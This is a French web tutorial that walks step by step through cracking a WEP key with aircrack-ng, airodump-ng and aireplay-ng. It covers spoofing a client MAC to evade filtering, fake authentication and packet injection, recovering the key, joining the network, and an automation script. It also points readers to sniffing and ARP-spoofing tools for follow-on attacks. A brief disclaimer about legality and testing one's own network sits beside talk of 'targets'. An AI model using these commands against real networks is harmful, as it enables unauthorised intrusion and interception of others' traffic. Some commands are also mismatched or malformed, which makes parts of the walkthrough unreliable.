home > aircrack
Déplacez moi !
Aircrack : comment cracker une clef wep rapidement avec la suite d'outilsaircrack et aircrack-ptw.
Le sujet du cracking WEP a été largement étudié et décris sur le web. De nombreux tutos bien expliqués existent ; ma petite contribution au cracking WEP a pour but de réexpliquer d'une façon simple l'utilisation d'aircracket aircrack-ptw de Christophe Devine.
Je tiens a vous signaler qu'aux yeux de la loi, il est interdit d'utiliser les reseaux privés sans en avoir l'autorisation sous peine d'une condamnation.Il est néanmoins intéressant et amusant de tester la solidité de la clef WEP de votre propre réseau avec Aircrack. C'est même tout à fait recommandé car c'est en utilisant les techniques des pirates que l'on arrive le mieux à se prémunir des intrusions'.
Le principe d'utilisation de aircrack pour cracker les clef wep est la capture de IVs avec airodump tout en augmentant le trafic grâce à aireplay.Les IVs sont des vecteurs d'initialisation contenus dans les paquets encodés en WEP. Certains IVs laissent filtrer des renseignements sur certains bits de la key wep. Une fois que l'on a récolté un nombre suffisant de IVs on peut alors commencer une attaque statistique avec aircrack. Il faut environ entre 700 000 et un million de IVs pour briser une clef wep de 128 Bits. Notez qu'aircrack-ng peu cracker des wep key jusqu'a 256 bits.
Le crack de WPA-PSK lui est basé sur une attaque par dictionnaire après moissonnage de paquets ce qui la rend parfois impossible. Un bon dictionnaire est ici indispensable c'est meme ce qui sera déterminant!. D'autres programmes comme kismet peuvent être utilisés à la place d'airodump pour capturer des packets. Aircrack est disponible sous Windows et Linux mais aireplay ne fonctionne que sous Linux.
Il faut tout d'abord passer en mode monitor. Je vous renvoi ici pour le mode monitor
aircrack@aircrack#./monitor
aircrack@aircrack#sh monitor.sh
Maintenant commençons par scanner le reseau à l'aide de notre antenne et d'airodump-ng (disponible dans la suite aircrack-ng)
airodump@airodump-ng#airodump-ng ath0
Cette commande lance airodump sur l'interface ath0.
Voilà les différents réseaux trouvés par ma carte!
Pour l'occasion je suis obligé de citer le très efficace scanner kismet dont voici un screenshot:
Maintenant un petit :
airodump@airodump-ng#man airodump
Dans mon cas je sélectionne le channel 11 avec cryptage WEP
airodump@airodump-ng#airodump-ng -c 11 --encrypt wep ath0
-c 11 pour bloquer le channel 11.
--encrypt pour bloquer le scanne sur le cryptage wep.
Si je veux sauvegarder les données dans un fichier; il suffit d'ajouter l'option -w monfichier
airodump@airodump-ng#airodump-ng -c 11 --encrypt wep -w monfichier ath0
J ai maintenant l'ESSID et mes adresses MAC de mes cibles; adresse MAC source et de l'AP; certain reseaux wifi font du filtrage de MAC donc il est préférable de s'appropier la MAC du PC client; trés facile avec l'outil macchanger
airodump@airodump-ng#ifconfig ath0 down
airodump@airodump-ng#macchanger ath0 -m 00:11:22:33:44:55
airodump@airodump-ng#ifconfig ath0 up
Maintenant il faut faire une fake authentification avec l'option -1 d'aireplay:
aireplay@aireplay-ng#aireplay-ng -1 0 -e mon_ESSID -a MAC_de_l'AP -h la_MAC_de_ma_carte ath0
Si tout fonctionne bien voila le srceenshot que vous devriez obtenir; sinon essayez une attaque par désauthentification avec l'option -0 (man aireplay).
Une fois authentifié on va essayer de faire de l'injection avec l'option -3 d'aireplay afin de générer les paquets necessaire pour la crackage de cl�s wep. Je peux lancer aircrack-ng a tous moment pour tester si j'ai intercept� suffisament de paquets
Lancement de l'injection :
aireplay@aireplay-ng#aireplay-ng -3 0 -e mon_ESSID -a MAC_de_l'AP -h la_MAC_de_ma_carte ath0
Ici je peux ajouter -r mon_fichier_de_capture.ext à la suite de ma commande pour dire a aireplay d'utiliser ce fichier afin d'injecter mes paquets.
Et je relance airodump pour capturer les paquets replay's.
aireplay@aireplay-ng#aireplay -3 0 -e mon_ESSID -a MAC_de_l'AP -h la_MAC_de_ma_carte ath0
Arrivé à ce stade et si l'injection fonctionne; d'ici 20 mn vous aurez suffisament de paquets pour lancer aircrack et trouver la clef WEP (pour une clef 128 bits il faut une moyenne de 1 000 000 paquets).
Voila je lance aircrack; il ne suffit que de quelques secondes pour trouver la clef WEP
aircrack@aircrack-ng#aircrack -x -0 mon_fichier.cap ath0
Fini j ai la clef WEP, il ne suffit plus qu'à de configurer ma connexion wifi avec ifconfig et iwconfig en spécifiant les paramètres correctes : ESSID, changer ma MAC si nécessaire, clef WEP biensur et au final un:
#dhclient ath0
#ping www.google.fr
Pour la suite de notre test consultez cette page qui vous expliquera quelles sont les possibilit�es offertes par les outils tel que dsniff;ettercap; hping; arpspoof ...
J'ai fais un petit script pour automatiser mes connexions aircrack voici la source a vous de l'adapter a votre convenance:
Note : il faut changer ce qui est en rouge par votre la configuration sniffer avec airodump-ng ou kismet
#cat mon_script.sh
#!/bin/bash
echo "modification de mac";
ifconfig athX down
#(le X de ath et obtenu avec #iwconfig)
wlanconfig athX destroy
macchanger wifi0 -m la mac-du-client
wlanconfig ath0 create wlandev wifi0 wlanmode sta
ifconfig athX up
iwconfig ath_de_l_AP ap MAC_de_l_AP
iwconfig ath1 essid "fanny"
#ifconfig ath0 up
iwconfig ath1 key WEP_KEY_CRACK
#iwconfig ath0 ap MAC_AP
echo "connexion dhcp";
dhclient athX
|
|
http://www.kismetwireless.net/ | La suite d'outils AirCrack-ng | WepLab | WepAttack | WEPCrack | ChopChop :
Pour me contacter (attention captcha)
